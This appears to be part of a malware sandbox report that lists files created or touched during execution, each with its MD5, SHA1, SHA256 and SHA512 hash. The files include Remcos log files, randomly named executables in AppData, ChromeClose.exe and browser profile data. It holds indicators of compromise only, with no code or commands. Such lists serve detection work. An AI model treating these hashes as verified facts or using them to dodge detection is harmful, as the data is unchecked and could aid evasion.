| SHA512 | d4525fe8e7ede099f11cf8f17736cf02a34ff8b40f6d324d0a5ec616ef2e75307e84a0b95ebb363fef7ea5633f653240e84d8be00faf16804bac9d50fe60e76a |
C:\Users\Admin\Desktop\2023-09-04\608c9d863cb5d8e929e019965787ced2f9b697b2344f7e1a5cd341fb131d9518.exe
| MD5 | 2772cd5e6bd65659ca6cce557588a046 |
| SHA1 | 91fca9240e0c5d1a71a1f6b7a3e16fa638b6d0bd |
| SHA256 | 608c9d863cb5d8e929e019965787ced2f9b697b2344f7e1a5cd341fb131d9518 |
| SHA512 | 7523fe56948359de53e59180d298d83e464112203de045de7ba81b6aeadce101273912f67ecd9892f508cc9b96ab4364340e991b24ec919fda3a6f6147b655a6 |
C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe
| MD5 | 6a2e5a9901ac89aab48ae125a799921a |
| SHA1 | be29a368dfdaa857f3a212656762e0f0215fea09 |
| SHA256 | 491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795 |
| SHA512 | da295a17dbb4a0936b7a68460738fc6437d112f749e563320f4036f28d1407552ab5023f4400e38529c1ed15e0a07b7ffd5e3b8bca6194bcb4619b84159ed106 |
C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
| MD5 | 7a3059b652dcbe5b578ec98a507dfb16 |
| SHA1 | 9f6938dac4e567fedbf5d6baa5488bf17cff7873 |
| SHA256 | 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c |
| SHA512 | ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9 |
C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
| MD5 | 7a3059b652dcbe5b578ec98a507dfb16 |
| SHA1 | 9f6938dac4e567fedbf5d6baa5488bf17cff7873 |
| SHA256 | 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c |
| SHA512 | ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9 |
C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
| MD5 | 7a3059b652dcbe5b578ec98a507dfb16 |
| SHA1 | 9f6938dac4e567fedbf5d6baa5488bf17cff7873 |
| SHA256 | 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c |
| SHA512 | ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9 |
C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe
| MD5 | b880e1ee1fd7e56bf0b5dc9f2a4b66ab |
| SHA1 | 89a7a7fbea80abf535b931a2df9263b7026634f5 |
| SHA256 | 689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac |
| SHA512 | 5f014baa7692791572feff30b2f71bc49c70b55909dd9824cdf85c3a23ca1ce36ec14f1ff64c51d1c126f511f1b2c444f7c9051a0f5af21f9e64c009c6500afb |
C:\Users\Admin\Desktop\2023-09-04\709f3e8040fb042a7c5634bce9cfc2879ce4d805a88b87ee631fc12f0f71de93.exe
| MD5 | 982662aa826163eee2b9d95965fd5cb8 |
| SHA1 | e30d9a8992e7b5fa96be5f3a6d40049246fc406c |
| SHA256 | 709f3e8040fb042a7c5634bce9cfc2879ce4d805a88b87ee631fc12f0f71de93 |
| SHA512 | bce5b1133c5b514ac8afa4251893bd74e9862ea0654c95a9633671c47aeacff949e5fa81a87ed31871f447da0f22f5fb35acb7ca623059213eb8dc24a1db29d2 |
C:\ProgramData\remcos\logs.dat
| MD5 | 39838844413fb1443b7d7a076a804319 |
| SHA1 | 93007b80667c859b17e9b5d12d6cd24f42612541 |
| SHA256 | 364d7914161830ba2447b21e2d9f45c68434f6b4b3de4ed9f0a94f16955850ae |
| SHA512 | c6d135590dcf0bce781f715daf5a10e2953dda94a4d8f5b7c6bb1f8ff19791cd7aa73c3ac8ab5b1f02975861bc67faadada40932c0dd0c33aa7c3fd3904a750c |
C:\Users\Admin\AppData\Local\Temp\nsn8A48.tmp\System.dll
| MD5 | a4dd044bcd94e9b3370ccf095b31f896 |
| SHA1 | 17c78201323ab2095bc53184aa8267c9187d5173 |
| SHA256 | 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc |
| SHA512 | 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Roaming\eWFNFYkXygiAi.exe
| MD5 | 990ca017afaae112752fe887ca1c4685 |
| SHA1 | 66ff556a6a9874b6c09e4e3babfb3e7d60a5b64f |
| SHA256 | 56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec |
| SHA512 | 1dbc542398b7bed36eaddd91800db5893bfc823981b35b18591e499769c99f66ae1eb162c408e39a64b7783c3e9339f8a18e42ded666c8c8f9ef8316c32500d2 |
C:\Users\Admin\AppData\Local\Temp\nsb43E5.tmp\System.dll
| MD5 | 17ed1c86bd67e78ade4712be48a7d2bd |
| SHA1 | 1cc9fe86d6d6030b4dae45ecddce5907991c01a0 |
| SHA256 | bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb |
| SHA512 | 0cbed521e7d6d1f85977b3f7d3ca7ac34e1b5495b69fd8c7bfa1a846baf53b0ecd06fe1ad02a3599082ffacaf8c71a3bb4e32dec05f8e24859d736b828092cd5 |
C:\ProgramData\remcos\logs.dat
| MD5 | 57aa9335d04508cdbe73065a3dea716c |
| SHA1 | c211fce7e6645cfd28c644ad004b65af34130c2a |
| SHA256 | 77a475a41167728adea9288153b510553a0e7121fdee2a0ddd1f8300d9857a82 |
| SHA512 | 62d3ccea0a64404eeb06702f6cdc6fd8e22a5b02c2277f528939687fe75d1a99216b29dcb2c7d48bc87c2ff6cb8acf66cd97212e06c9489454ec3d000eb4a303 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | d6b5dea566a345230ad012011af2e007 |
| SHA1 | 08445610f34829d416d2a5e0a769e8e4afebe4b9 |
| SHA256 | dc8608dd5a5bcc787fca786fc6a5955f517c45b27f9ead4b8edffa4529fed82d |
| SHA512 | 6c4ee8b8adb4f66bacd7ab43c67f7923354d2d7e06fc1e485b98d7b081411787750034bf9b97ea5aecea22deeac49985957a1068e023a00719b393e2bd0cf513 |
C:\ProgramData\remcos\logs.dat
| MD5 | 1b90fb00ce07a999f63dd4e35bce7a91 |
| SHA1 | 77fd2f839f8cf63e0d6cd1d67d0aaebcad383683 |
| SHA256 | d3ff80aadd76356c846b30d2bed66a94bc1b51428bf6053af0958a368a38c1f8 |
| SHA512 | d30e3981c0b218bb8b430167efcd47e1286face810143845ae90275e4349e654115f41eafe728ed9d45bf84622547bd1daa0d358b300546d043b9612b7333383 |
C:\Users\Admin\AppData\Roaming\ClWWWrRvtgVoLl.exe
| MD5 | 57ed9d68311194b21afbc9b33168ddc5 |
| SHA1 | a30c8e48c8de418183fef9daed67276e59115736 |
| SHA256 | 532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c |
| SHA512 | 24cb9aaf1fddf7dcd0f64314e541d5bd69965a2c6ca7705ea4e6e3646a6d0bc10662cd2902e7abc0ae28069ee582ed7fb3a9a308aa18f6fd4593179495c0db57 |
C:\Users\Admin\AppData\Roaming\NzdSupOimejfx.exe
| MD5 | 880f010fc75f433c8e6a4f9931c093fa |
| SHA1 | 4782fce5926ff14618e80780d9343dcef78e789d |
| SHA256 | a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138 |
| SHA512 | 19f7ba28d2870714b5fb63c9f0dfb405647671a59058be6685a8eb336fb61dfd2358cddd49765314981cd52851e4f1359dfa9e36b231726848749332935ac72e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\ProgramData\presepuesto\LEAJ.exe
| MD5 | a5c6dcf7ef6eac4c0157b5e2f0155424 |
| SHA1 | 248ad0e9f6f403d172a54abaeaf92df074d617fe |
| SHA256 | 6707dfab5d78cad62a28c59519e5809092c5b3d817d39c15a472f0363e88a5fa |
| SHA512 | 0e12dc417988ac0358ea7807c4ba1b9894d2679607734b883be5db3cea0e45a537524ac625ab941a377b686f80e92a6623f6bcd06459c848ca04720cc3f7b24c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\b7c624d9d311fdcf61b244bf0defe0d3
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Users\Admin\AppData\Roaming\NIebSjcCgFnY.exe
| MD5 | 5d614c684e28b641cb1baa235b93a607 |
| SHA1 | 897be2a7d89a460e785eb8d709fc5af5e063e489 |
| SHA256 | c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200 |
| SHA512 | 8ba03f06694bd7668f6c7cea090e00823927a66c99d8f06ce2b40f213a03420430f152e2f32e115d2266e12221d7b5b0448ab8eb25cc2b26a8f513f424c5ab96 |
C:\ProgramData\remcos\logs.dat
| MD5 | 270861f193de870f3f0831b1883d46bc |
| SHA1 | c3997a1b98da315cca57091944d231f855b36b93 |
| SHA256 | 291bdcd5b7eac40ec216d4628dee6fc1da2a6fba210b159a4e213cf63694e93c |
| SHA512 | 76953e82d4ca1ec03014f68903f7141cf8cb3888105c5a0ea246e33d51907f92016257fbe6f9d7bd3aa6c5a3f7dfa36da1b83f97dfed0ce5b891423d7dcac47a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 116dc81b2e155b24b73420560878c311 |
| SHA1 | a9b49fabb60645d4775e5de6ee26fb937f7b4c88 |
| SHA256 | 0ac74fb20e394b10f1a189a8c2669dc21013da282f5eb09e1ba989a085cec245 |
| SHA512 | 30987a5e32eb76e510f0927dcd35570e84fe59e7c896e2fe0dc928fae1f2b3254cfce9907aa586d862bbb741aee838ee621752c62fc73da920e9c6ffda36eb5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 34bd51a54343a5057e841035b4192a7e |
| SHA1 | e9c282c355ed209131209385b8dcaed48ee7d233 |
| SHA256 | 442d3ce65135959e73121917e6fedaef9390dd01404e2c29d6284e9ae2d4df7c |
| SHA512 | aa3fcd248cf5f65a81e1a954fa20dd07f48985e7ab58d197217f08aa1c00d78c880531384e69369b161bd94bf1fdbc7e4b710e4bbcf5f51d5ec01dca9d9e09ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | faea25d2e8c6f4f75fb00397a2bf902f |
| SHA1 | 45f5658d724c14d9a7b30905ab38827225e0fa87 |
| SHA256 | 51675f3dacc189d2582a29b70fd660fd64c7dea1e9f9c28f112505c2399ee601 |
| SHA512 | 44de418c8a6ba02e2486b939001b533663a65b2de388ff579b9e80fd4d25af38117f690feeb3adaa4a5bc13130146f9d2ffafe12407d2b22cf4b39160a096eec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7afd9cf2f8f0f339f558f37d731fad65 |
| SHA1 | bfdbd18a698e09e85bff2a754263e026ea1da0b2 |
| SHA256 | f47dbbc2276cb7f0d72c171a64bf3c95fe79a057cca46261d5398a23eebc46b7 |
| SHA512 | 62790c07a052702799e1799f5f0231ec69b3640df9cde0f03e4a47f0ed0de9aa4e1ca89848a0a14f5e56a0cec7349355ac8a6021acc006df088f5ea29f64343a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0585c1dd7fc2ac8d4a583b116b50f196 |
| SHA1 | dd0b1c48c444594605eafb460a138401ae2e9548 |
| SHA256 | 43d958c6d01369f0922dba0eb97f4f0d5165662051dee39a78504f3ba778f400 |
| SHA512 | eeeaa24243812739d007ffa676973968059a0afa9185dc8433ded672ff206bd08b11667378728c80220d9982d81a0729a28be084871b641d3776e9bfbbbfbf9e |
C:\ProgramData\remcos\logs.dat
| MD5 | d982aecb2cd47ee52d3b9c5f11349fda |
| SHA1 | fd9ab0899c87003e5a536f4850916e6c976fea68 |
| SHA256 | 78715dba97385f5b7aa2fbca13ed432d82ccea5dcaec62ceee9482293e5c140b |
| SHA512 | 2cce43c2d8565b318aef3eb759e0080f8fb497d72456b799062569427d13c5771c41c881fb99b3e7d647de869d128654a9969fc44b66b67f4f9bd6abe948fe67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 37bba22a8163573fd0ccf43f5eb0b6c5 |
| SHA1 | c830f935ca77f5db4e1d8333a5d18d19e6f1c673 |
| SHA256 | 4bbeda8396e4b40c79c4b38a6a9e4850acd04831aa5c239bd983088235caf4c2 |
| SHA512 | 943183d59e07a26d65bd4dabb11020beaa48a65c89962f4890d044c517e12e7f31aa03193ecc78abcb9fa5acab3a3b720934af4632e37f5963cdc1667546bc03 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8da1a1af3d70ce0515b6bfd3b0307f44 |
| SHA1 | de25a142736f5c1c0e7b0ffc59621fa71c09e665 |
| SHA256 | e0e018b8ddcbd968abba02ae88e045cfe5859953c9a2bfdd00b6059593744401 |
| SHA512 | fdf4ac5fd8b83dcc47ceeacc5aefe854580a923fb5a6b59a657da58819a30d45b4dbaa12d7a77c62f3b9a187a2ce190ccf1d9e7fe69ab944e3e0402fef90cb75 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c0690460da732519fb2f851f638301ea |
| SHA1 | 7a3c4e4877e815822468b7030d165c4467dd491b |
| SHA256 | e090b454301ff333268a2f1b5a0b7a5d766874fd2e084e349a2d525f2738937c |
| SHA512 | 73705c7175117a3b952659bb51827ec646e96b62ed9d0ec3406c0bb42e02248361391a7ffa11340b8931023a7dda8cb5e02ef05a0c63bf649077bbf42c706eed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ef6514d69380b59c73082c79a26bd27a |
| SHA1 | c20c14980b412d1b68ec65098d262890bb56890c |
| SHA256 | c6f96f237e982b72a962afebd4cce165a41f86c781b3963e8d217f5a4ad9158a |
| SHA512 | e2b76de07cd83d5780fb74c3d599761c76871e0f0cc5762a2b369d30e9f7a24c12fd523b7a834a6fe82be73d2bb244184b134f9d090fde71ac1c049e61afb752 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c672abe0b6c5d440122a3f276e99685b |
| SHA1 | 8f1016701f1cc5e617adc23ace360b8108bbe0a9 |
| SHA256 | 9b41ca51971664bf73ce0f8d82234c1e2adf6891789722d2e84ed29d8e6901fb |
| SHA512 | a9330fcf4f473a8498c6d817ffc15aa8474f44fad322c7fff57e4029392f35cf3a5c5b42b5a6f23d2ab0007cbc7df1c23df8033ce596fffb79ff42da430e1eaf |
C:\ProgramData\remcos\logs.dat
| MD5 | f40450df4cfb72bd2b4b9b952ebb8c8d |
| SHA1 | 3b0b8966f0c437119e3bf3b7bf6e28a6dee9ce8b |
| SHA256 | f228055aa20cd6bffe07fed706cbcc4d868f0772aa5394c5d2fcce2bb8c30220 |
| SHA512 | bf65a4fddf502dbb581a0523645360cd9c9f24700fc49ac19fca698cc38cdc5f9f13ba35e853a0435e293f25b6ab44ec1c45e002cfe9f9dbe2e88342e4aec4c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 98c9921bff23cd9124be7db91de2be5e |
| SHA1 | 5a682d71ca8ec619fa72b65f6c85c5caa6f342dc |
| SHA256 | 8d46378e78e1af6bd17ec5b17f6c48faf651175817edde0c186222403fa0f730 |
| SHA512 | 7f0fd21a24a16b483f2ce86b69b0f980367ac26218585fe99c662759079112ec6f901fd899500583753f63d4cc634c72a9a8957541e9b91599335c9f2a94e146 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9ca1fca6ee5e78e0f0892a2982316a28 |
| SHA1 | 2e545fc4135c78b964447b3c2284ee4fbcb79ba6 |
| SHA256 | c07a5919b0cc1a681ac2e54641943809ee44acb5fc2f791a0d5af0699bccb9bd |
| SHA512 | 246c02ec6b635da92541a3b33bff92e437c617a9119d0d9b19c7aed381597beea0026c06618f5b030bd1386e458796f60c066483ff6a0a20c8d155f581f26112 |
C:\Users\Admin\AppData\Local\Temp\DB1
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Roaming\N90OPR2B\N90logrv.ini
| MD5 | bbc41c78bae6c71e63cb544a6a284d94 |
| SHA1 | 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a |
| SHA256 | ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb |
| SHA512 | 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bbc43d2f-b84f-43fb-ba4f-42d4194d6537.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\Zibvxn\colorcplhhd0qj.exe
| MD5 | 0cf1c234e21549b221bc4b2c81e28037 |
| SHA1 | 06f7b2c8d262c7703ac8bbcc3038a6bbea1a4b67 |
| SHA256 | 45ff6ee0df94a3cb333b709f521ca3818bc567bf34bfe7fd4533d3971789d539 |
| SHA512 | 6c2423374598fcf7d782450363a2e871deb2909a436f0daafc193ff17ea3a4ab575b4bba73eed608416f62231cc28dcd953de07da6ad913707b52611ae98897c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | dcfea5506c4920646d7ffa54f4430d40 |
| SHA1 | 5b2e5f1cc9e7ded2ab9f4bd97a4c8bcd98349845 |
| SHA256 | eada47de8bdd1ab6fa35083477bc118f0be2d3b2d87a67f41ef0e01a0977bd12 |
| SHA512 | b5702aaad7ad416eba9dd97cd7a399ee4f511cc1fbf6efb6f47a59a0854a9b56a92eba6749cf1dea1895e816e887826999e71fc6f1453c11043c1fff03de96ca |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c9122f329bbcc9f7403c4003080f712f |
| SHA1 | 6aae415a7086ff49722fbe1bfd4d54327e90d8f4 |
| SHA256 | c7ea9f1bac05c4d87ed8f07c87ca5a4c285c84c632fc30a86dc44b4812f8ce86 |
| SHA512 | 6b03f51063cc1efc0cce9b530f1a9d36e640f8a84ebca89fdc3cebc52499ff30aa788d49c4f9d3befc6d5c90b784e2dc0406e27887bfe744fdee2391cff1ba39 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a761d6e55b338e8cfb6c5651edcfe56d |
| SHA1 | eebbac9ef33ffb4e1df2e4d60d870d26896c196f |
| SHA256 | 2939cb5d0fec6759cb1955b6977b5e7077572e3f5080fd829500395eb1e56998 |
| SHA512 | 719b8e220d219e4280ae172f4d4272afb2be04e80f5b1b91481c52a3ffd9bf37043c598fb4dee0df35228283a6c372f2eeffd1dde0dfed9c3d68855eaa6d7b27 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1a4f822a5b6684aa54c3116d967abc06 |
| SHA1 | 798031ae218c9b8e3687adaf83471afd39b18429 |
| SHA256 | 421f720d9e00e393d100acb8127e4fc2494fc80501f944a6f466dd5745c7d3f6 |
| SHA512 | dd098a0eca0b2036b3132135b3f07f6005d38a01d52a7b25d65b5cc7e21a0b3cf5388a8ad111a4f3332cb220b1af7d60fb43bb0219b16426f36768362deb8495 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8675cf6f5b51c2659ff178e8d5864710 |
| SHA1 | a999f96c112a915c01c44075511d5c07190e68df |
| SHA256 | 4ccea29d8cc1852ee4d7f6442f2c35480fe89f6fa057477650e6a6af5a1975f5 |
| SHA512 | 839b0cac067fbb6d01ab5c1ead066227652fbfd2b5ba6eacee309e48e6e20dad26db625adc4a81bb3cc7d2993347bb12cc048c9cff0e61383e353ec38cb11bb3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8ef4127a7c1e9dc4992f02e479268c14 |
| SHA1 | ec97b7e80e6aa7f2d337d312e84732aeb599cd59 |
| SHA256 | ce5badf61f761a0997ac2166f8378fe9795187394e39707951d685f756e14192 |
| SHA512 | dac70e6acd8c80c1a764dba582195080d3923206ce2de8284a8cf5280f7cc6156f3a748ea1efc37ab287dc332993f53b7f4989c25ca5305a41a4e2eaad8504b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3d35acdd04d1d90b7e2a866ef6f73d0f |
| SHA1 | bf7ec29675f3c4063a50db71d9b7df6e5699f6fd |
| SHA256 | 4d51a8792dad1d23e19f1e4caf5188c69912351012a8ea15f12703c106bb5f0e |
| SHA512 | ac1ed321efe3d11c8481e0c7877df43e5cc9cc0510e80d5893050191b70da387e6fecf5417833801feab9312885015aaeaa2a6650a17d8f145fb28e6cf64e781 |
C:\ProgramData\remcos\logs.dat
| MD5 | f94757b0f453a84be0646eff88b83702 |
| SHA1 | 6886f0dc4df49cf2823c74af01891fa169635c2c |
| SHA256 | 224153108f336e8b291896f03cf244a870c08e2a28a62f9820a3dae021bd6618 |
| SHA512 | 20dd94e2b619f86fc02859608361a4b252ee5a11b28517bd83e42b0d09cf76d00361bcec511b1d6d8ae48a2d172f5ba21d8808afe6af189c2cd7160ac2fb4ae6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 5c59c5525143ea3518e9ee116e922d64 |
| SHA1 | 70e11b9f438f61bde08af34d38fe7a1297cc0130 |
| SHA256 | b42381c6d659c060d003b7d73d90cdd4424454285a1f6a74e0dfea912a89be83 |
| SHA512 | 9573957f7383561cc0f0c63801225c54efb29c148ced9a40d367242a30a7985cbf4919fa3e49b1ff156b52f5b7b6f2fcd0ba8123329bebec261878f0dcf1551b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 367e7436ea30b05ad06941e5f9c5e951 |
| SHA1 | cb33d28c81917cfeba0aa3bf8e301a24c658f182 |
| SHA256 | 6fe8f3418490883b6e27985559bb88f8cb6e7e50daab01498d6928d82f102c49 |
| SHA512 | 8491398ff37ce7c14b39698b463d2f27cd698f281a51919526ede7e4c87af0c0a50c6902a1ae5e64c18d6243dd969cf8d0612f752b233a28e8eb900906545f94 |
C:\ProgramData\remcos\logs.dat
| MD5 | ad99059913b0e8eeb22f1af9e2adbb7c |
| SHA1 | 80f29a9c9ea82b18ec0074382278dab467100bab |
| SHA256 | c582ac576e51806c2bd3e3dc3aacbad3041f46c56a15fcb73404bf0d75ff5ed3 |
| SHA512 | 4c956e518d0118682d4d16f445e4abc4c2981b8f163ea470c10403cd928df210777cd815ad3f668045500b98115087877c688c879e8eb553c056fbeece7edbd6 |
C:\Users\Admin\AppData\Local\Temp\0a5e422e-e2c2-44fb-ba13-a7af99ab17ca.tmp
| MD5 | 2a9208779e131bc39bc8b31f6e14e3f0 |
| SHA1 | 9cfa608cf150c47fdc58bd7f3d9d82665b44564d |
| SHA256 | 921c292d54f1c0529ca6b3888249192c4bcafe54e3b667ca5da669b29015604a |
| SHA512 | 65167c811075a68049987b853ea701366b31d7a737b9b82be2f5c4936d1f83377b8081ec478946a8473abd0aa38518da0f543d24805052191dc012eac9f98104 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 6590dd652d15fe353433b1f90f0b36ad |
| SHA1 | df895c7bcb28f6248ed68b3337b85321ff6fb781 |
| SHA256 | 86ccc4b7919b32b2d5bb4d3a5201def7de41cdb0a77a72de0f70f68d46d34ee4 |
| SHA512 | 017345e1227f2ec53a999be0ac3fab5165c054d540abe76c4a4e1877d1d8ebe3a804b987a0f366722abe8b40150ad245c21e31c5dab88236703eb1d20f458fa0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\204809db-cfde-466b-acbb-c035a009d5da.dmp
| MD5 | aaadb8737b2302da0e30ed890cfcadcb |
| SHA1 | 20b4989fd1298a1469a9ffcbb4806b5c3fc21689 |
| SHA256 | b2eadcd5a05971f4a07b1eaabeebfe184643fac097b399fae1d18c83439ebed5 |
| SHA512 | 21a60d4ec6affc911b1bcdba628efa297e82d20abd630c4afcf4ccb3425420f3fb5cb31d86946e991eb4552a491f8a5b08fed86b6aa256b8964b50cdd2ca0f08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 81b4ec23ff29d42ddaf413e787c58fa3 |
| SHA1 | 667b6e1d1cca8803e98dcbcfacc47e77ce26b9cc |
| SHA256 | 2420ea1e70d2630c451a104356ed53c0f9bce49a49939b8922703821cf4d35ed |
| SHA512 | a286f62a7a4ad460654112566e2b1651af7b613dae21a471d026d5dd3716347bc5b54e89c456f0ccf35858cc364679dc1d65708e2675af9e8e29cc0d4d8706f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\95bcf356-c160-4dc4-aa78-1143c3ea8bac.tmp
| MD5 | c61d6b4c36b151379193a358aed10595 |
| SHA1 | 4a757ababd401eb0c3f466333ec63ac8b2b52a5b |
| SHA256 | 08cb90d6855ee02abc0812b5b3c414c1623fea0381bc4be6af1ea13e3179a69f |
| SHA512 | 48cfcc3db1f71886227737dace4d4e66fe7810f098efbf9dc705e83ed439beb055de98578d352ee11c8063776934fdb4fe6aa61dd8f30c5fa6d579fdd018c9b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ab406bd1d38ef09099dcccceabbdfd26 |
| SHA1 | feb11b4ea5b1ea843b876644a2ed76cb396d34a8 |
| SHA256 | 8842c5ea6b815693a57f0f49731d85366793d9b297fe467c8d9076dd268c54bd |
